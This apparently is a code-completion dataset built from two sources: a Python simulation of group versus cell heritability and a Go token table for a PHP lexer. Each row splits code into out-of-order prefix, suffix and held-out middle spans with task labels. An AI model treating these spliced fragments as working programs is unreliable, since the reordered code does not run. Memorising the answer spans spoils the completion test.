#mannwhitneyu(mis,control_mis) -> (47673.0, 1.2864021557444156e-64)
return mis,control_mis
| """Compute error for site, given matrix"""
return score(matrix,site,ns=False) - C | identifier_body |
Script 1-relative heritability-plotted(Figure 2a)-2.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 06 10:26:07 2016
@author: Will Ratcliff
"""
import numpy as np
np.set_printoptions(threshold=np.nan)
import math
from scipy.stats import linregress
import matplotlib.pyplot as plt
import pandas as pd
cell_genos=np.linspace(1,2,10)
st_dev_cell=0.3
st_dev_group=0.25
timesteps_to_run=4 #this is equivalent to the number of generations the seed population of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
cluster_variance_factor=np.random.normal(1,st_dev_group)
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
| offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (linregress(parent_size_cleaned,offspring_size_cleaned)[0]))
print("heritability cells", (linregress(cell_x,cell_y)[0]))
"""
tempratio=(linregress(parent_size_cleaned,offspring_size_cleaned)[0]) / (linregress(cell_x,cell_y)[0])
stdev_list[ii].append(tempratio)
cmap = plt.get_cmap('rainbow')
colors = [cmap(i) for i in np.linspace(0, 1, len(stdev_list))]
#print "group_sizes", group_sizes, len(group_sizes)
#print "stdev_list[4]", stdev_list[0], len(stdev_list[0])
#print "group_sizes_list[4]", group_sizes_list[0], len(group_sizes_list[0])
for i, color in enumerate(colors, start=0):
plt.scatter(group_sizes_list[i],stdev_list[i], color=color, alpha=.5)
plt.xlabel('Mean number of cells per group')
plt.ylabel('Ratio of group to cellular-level heritability for size')
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.png" %(st_dev_group), dpi=300)
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.pdf" %(st_dev_group)) | parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
| random_line_split |
Script 1-relative heritability-plotted(Figure 2a)-2.py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 06 10:26:07 2016
@author: Will Ratcliff
"""
import numpy as np
np.set_printoptions(threshold=np.nan)
import math
from scipy.stats import linregress
import matplotlib.pyplot as plt
import pandas as pd
cell_genos=np.linspace(1,2,10)
st_dev_cell=0.3
st_dev_group=0.25
timesteps_to_run=4 #this is equivalent to the number of generations the seed population of 10 clusters (each with a different genetic mean size) goes through.
number_of_stdevs=5 #this name is a bit confusing, but this is the number of different st_devs to be run in the iteration
replicates=10
#use these lists for running multiple iterations of cell and group stdevs
group_stdev_iterator=np.linspace(.0001,st_dev_cell,number_of_stdevs)
cell_stdev_iterator=np.linspace(.0001,st_dev_group,number_of_stdevs)
group_sizes=[]
st_dev_cells=[]
st_dev_groups=[]
slope_cell=[]
slope_group_volume=[]
slope_group_radius=[]
slope_group_settling=[]
stdev_list = [ [] for i in range(number_of_stdevs) ]
group_sizes_list = [ [] for i in range(len(cell_genos)) ]
gs=4 #is the number of cells per group from 2 to 32
"""So, here's how the population is initialized:
Col A: Cell ID (#)
Col B: Cell genetic size
Col C: Cellular phenotype
Col D: Cell parent
Col E: Cluster ID (#)
Col F: Cluster parent
Col G: empty
Col H: empty
Col I: empty
Col J: Cell parental phenotype"""
for ii in range(0,len(stdev_list)):
for a in np.arange(2,gs+2,2):
cluster_size=a
off_spring_std=a/3
for b in range(0,replicates):
pop=np.zeros((len(cell_genos)*cluster_size,replicates))
#print(np.shape(pop))
st_dev_cell=cell_stdev_iterator[ii] #change this to st_dev_group=group_stdev_iterator[ii] to iterate across group-level variance
#st_dev_group=group_stdev_iterator[ii]
#initialize the population
#for i in range(0,np.shape(pop)[0]):
for i in range(0,np.shape(pop)[0]):
pop[i][0]=i #ID each cell
pop[i][1]=cell_genos[math.floor(i/cluster_size)]
pop[i][2]=np.random.normal(pop[i][1],st_dev_cell)
pop[i][4]=math.floor(i/cluster_size)
timestep=1
#print(np.shape(pop))
pop1=pop
#run through a round of reproduction
for j in range(0,timesteps_to_run):
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
cells_added=len(cell_genos)*cluster_size*2**(timestep)
print(int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep),off_spring_std)))
cells_added_first=len(cell_genos)*cluster_size*2**(timestep-1) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
#cells_added_first=int(np.random.normal(len(cell_genos)*cluster_size*2**(timestep-1),off_spring_std)) #this counts up the first reproductive event within the timepoint, total cells added is for both offspring clusters
"""
print("st_dev value %d of %d" %(ii, number_of_stdevs))
print("cluster size", a)
print("replicate", b)
print("generation number", timestep)
print("population size", len(cell_genos)*cluster_size*2**(timestep-1))
print("number of cells added this timestep", cells_added)
"""
#first cluster produced
cluster_variance_factor=np.random.normal(1,st_dev_group)
for i in range(0,cells_added_first): #this loops through every additional cell for the first cluster offspring
if (cluster_max+math.floor(i/cluster_size))!=(cluster_max+math.floor((i-1)/cluster_size)): #if your cluster number does not equal the one lower down from you, then you get a new cluster-level variance factor.
|
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added_first][1],np.random.normal(pop[(cell_max+i)-cells_added_first][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added_first][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added_first][4],0,0,0,pop[(cell_max+i)-cells_added_first][2]]])
cell_max=int(max(pop[:,0]))+1
cluster_max=int(max(pop[:,4]))+1
#second cluster produced
for i in range(0,cells_added_first):
pop=np.vstack([pop,[cell_max+i,pop[(cell_max+i)-cells_added][1],np.random.normal(pop[(cell_max+i)-cells_added][1],st_dev_cell)*cluster_variance_factor,pop[(cell_max+i)-cells_added][0],cluster_max+math.floor(i/cluster_size),pop[(cell_max+i)-cells_added][4],0,0,0,pop[(cell_max+i)-cells_added][2]]])
timestep+=1
pop1=[]
for j in range(np.shape(pop)[0]):
if np.random.rand() > 0.05:
pop1.append(pop[j])
np.savetxt("full-population.csv", pop1, delimiter=",") #this will save a CSV of the whole run, use for statistics or error-checking
cell_x=pop[:,9]
cell_y=pop[:,2]
cell_x=cell_x[len(cell_genos)*cluster_size:]
cell_y=cell_y[len(cell_genos)*cluster_size:]
#linear regression of parent on offspring phenotype
#print("slope of parent-offspring regression for CELL size is", linregress(cell_x,cell_y)[0])
#Pandas dataframe work isolating groups
df=pd.DataFrame(pop1)
size_by_ID=df.groupby(4)[2].sum()
parent_by_ID=df.groupby(4)[5].mean()
print("I AM HERE!!!")
joined=pd.concat([size_by_ID,parent_by_ID], axis=1, ignore_index=True)
parent_size=[]
for i in range(0,len(joined[0])):
j=joined[1][i]
parent_size.append(joined[0][j])
offspring_size=joined[0]
parent_size_cleaned=list(parent_size[len(cell_genos):])
offspring_size_cleaned=list(offspring_size[len(cell_genos):])
parent_radius=[]
offspring_radius=[]
for i in range(0,len(parent_size_cleaned)):
parent_radius.append((3.*parent_size_cleaned[i]/(4.*math.pi))**(1./3.)) #manual check of this calculation confirmed it is correct
for i in range(0,len(offspring_size_cleaned)):
offspring_radius.append((3.*offspring_size_cleaned[i]/(4.*math.pi))**(1./3.))
parent_stokes=[]
offspring_stokes=[]
for i in range(0,len(parent_size_cleaned)):
parent_stokes.append((9.81*(2*parent_radius[i])**2*(.1)) / (18.*1.002)) #Manual check of this calculation confirms it is correct. #9.81 is m/s gravity, then diameter (in Meters, which we might want to change!), then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
for i in range(0,len(offspring_size_cleaned)):
offspring_stokes.append((9.81*(2*offspring_radius[i])**2*(.1)) / (18.*1.002)) #9.81 is m/s gravity, then diameter, then difference in density of particles from fluid, dividied by 18*the dynamic viscosity of water, which I chose 20deg C as the temp. http://www.calculatoredge.com/new/stroke.htm and http://www.engineeringtoolbox.com/water-dynamic-kinematic-viscosity-d_596.html
"""
print("slope of parent-offspring regression for GROUP volume is", linregress(parent_size_cleaned,offspring_size_cleaned)[0])
print("slope of parent-offspring regression for GROUP radius is", linregress(parent_radius,offspring_radius)[0])
print("slope of parent-offspring regression for GROUP settling speed is", linregress(parent_stokes,offspring_stokes)[0])
print("size", parent_size_cleaned[1], len(parent_size_cleaned))
print("radius", parent_radius[1], len(parent_radius))
print("stokes", parent_stokes[1], len(parent_stokes))
"""
#group_sizes.append(a)
group_sizes_list[ii].append(a)
#slope_cell.append(linregress(cell_x,cell_y)[0])
#slope_group_volume.append(linregress(parent_size_cleaned,offspring_size_cleaned)[0])
#slope_group_radius.append(linregress(parent_radius,offspring_radius)[0])
#slope_group_settling.append(linregress(parent_stokes,offspring_stokes)[0])
"""
print("heritability groups", (linregress(parent_size_cleaned,offspring_size_cleaned)[0]))
print("heritability cells", (linregress(cell_x,cell_y)[0]))
"""
tempratio=(linregress(parent_size_cleaned,offspring_size_cleaned)[0]) / (linregress(cell_x,cell_y)[0])
stdev_list[ii].append(tempratio)
cmap = plt.get_cmap('rainbow')
colors = [cmap(i) for i in np.linspace(0, 1, len(stdev_list))]
#print "group_sizes", group_sizes, len(group_sizes)
#print "stdev_list[4]", stdev_list[0], len(stdev_list[0])
#print "group_sizes_list[4]", group_sizes_list[0], len(group_sizes_list[0])
for i, color in enumerate(colors, start=0):
plt.scatter(group_sizes_list[i],stdev_list[i], color=color, alpha=.5)
plt.xlabel('Mean number of cells per group')
plt.ylabel('Ratio of group to cellular-level heritability for size')
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.png" %(st_dev_group), dpi=300)
plt.savefig("Ratio of group to cell heritability iterator=cell variance, group sd=%s.pdf" %(st_dev_group))
| cluster_variance_factor=np.random.normal(1,st_dev_group) | conditional_block |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml
EncapsedAndWhitespace
ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string |
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok {
return t
}
return String
}
func NewToken(t Type, literal string, line int) Token {
return Token{Type: t, Literal: literal, Line: line}
}
| {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
} | identifier_body |
token.go | package token
import "strings"
type Type int
const (
End Type = iota
Include
IncludeOnce
Eval
Require
RequireOnce
LogicalOr
LogicalXor
LogicalAnd
Print
Yield
DoubleArrow
YieldFrom
PlusEqual
MinusEqual
MulEqual
DivEqual
ConcatEqual
ModEqual
AndEqual
OrEqual
XorEqual
SlEqual
SrEqual
PowEqual
Coalesce
BooleanOr
BooleanAnd
IsEqual
IsNotEqual
IsIdentical
IsNotIdentical
Spaceship
IsSmallerOrEqual
IsGreaterOrEqual
Sl
Sr
Instanceof
Inc
Dec
IntCast
DoubleCast
StringCast
ArrayCast
ObjectCast
BoolCast
UnsetCast
Pow
New
Clone
Noelse
Elseif
Else
Endif
Static
Abstract
Final
Private
Protected
Public
Lnumber
Dnumber
String
Variable
InlineHtml | ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
